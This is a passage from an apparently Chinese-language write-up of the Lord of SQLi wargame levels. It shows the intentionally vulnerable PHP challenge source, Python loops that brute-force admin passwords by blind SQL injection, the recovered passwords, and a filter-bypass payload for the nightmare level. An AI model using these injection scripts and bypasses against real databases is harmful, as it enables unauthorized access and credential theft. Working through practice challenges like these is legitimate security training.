for i inrange(20): for s in string.printable: r = requests.get("https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw="+payload.format(i+1, ord(s)), cookies=cookie, proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'}, verify=False) if"Hello admin"in r.text: temp = temp+s print(temp) break
for i inrange(20): for s in string.printable: r = requests.get("https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw="+payload.format(i+1, ord(s)), cookies=cookie, proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'}, verify=False) if"Hello admin"in r.text: temp = temp+s print(temp) break
for i inrange(20): for s in string.printable: r = requests.get("https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw="+payload.format(i+1, s), cookies=cookie, proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'}, verify=False) if"Hello admin"in r.text: temp = temp+s print(temp) break
最后得到admin的pw为:77d6290b
12. darkknight
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
<?php include"./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; echo"<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo"<h2>Hello {$result[id]}</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); highlight_file(__FILE__); ?>
for i inrange(20): for s in string.printable: r = requests.get("https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=1&no="+payload.format(i+1, ord(s)), cookies=cookie, proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'}, verify=False) if"Hello admin"notin r.text: temp = temp+s print(temp) break
等到admin的pw为:0b70ea1f
13. bugbear
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
<?php include"./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; echo"<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo"<h2>Hello {$result[id]}</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); highlight_file(__FILE__); ?>
for i inrange(20): for s in string.printable: r = requests.get("https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=1&no="+payload.format(i+1, s), cookies=cookie, proxies={'https': 'http://127.0.0.1:8080', 'http': 'http://127.0.0.1:8080'}, verify=False) if"Hello admin"in r.text: temp = temp+s print(temp) break
<?php include"./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); if(strlen($_GET[pw])>6) exit("No Hack ~_~"); $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; echo"<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) solve("nightmare"); highlight_file(__FILE__); ?>
Payload:?pw=%27)=0;%00
mysql连等,从左到右依次计算,select id from prob_nightmare where pw=('')=0;,pwd=’‘为false,然后0为false,false==false,所以最后语句为select id from prob_nightmare where pw=true,即可绕过
19. xavis
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
<?php include"./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); if(preg_match('/regex|like/i', $_GET[pw])) exit("HeHe"); $query = "select id from prob_xavis where id='admin' and pw='{$_GET[pw]}'"; echo"<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo"<h2>Hello {$result[id]}</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_xavis where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("xavis"); highlight_file(__FILE__); ?>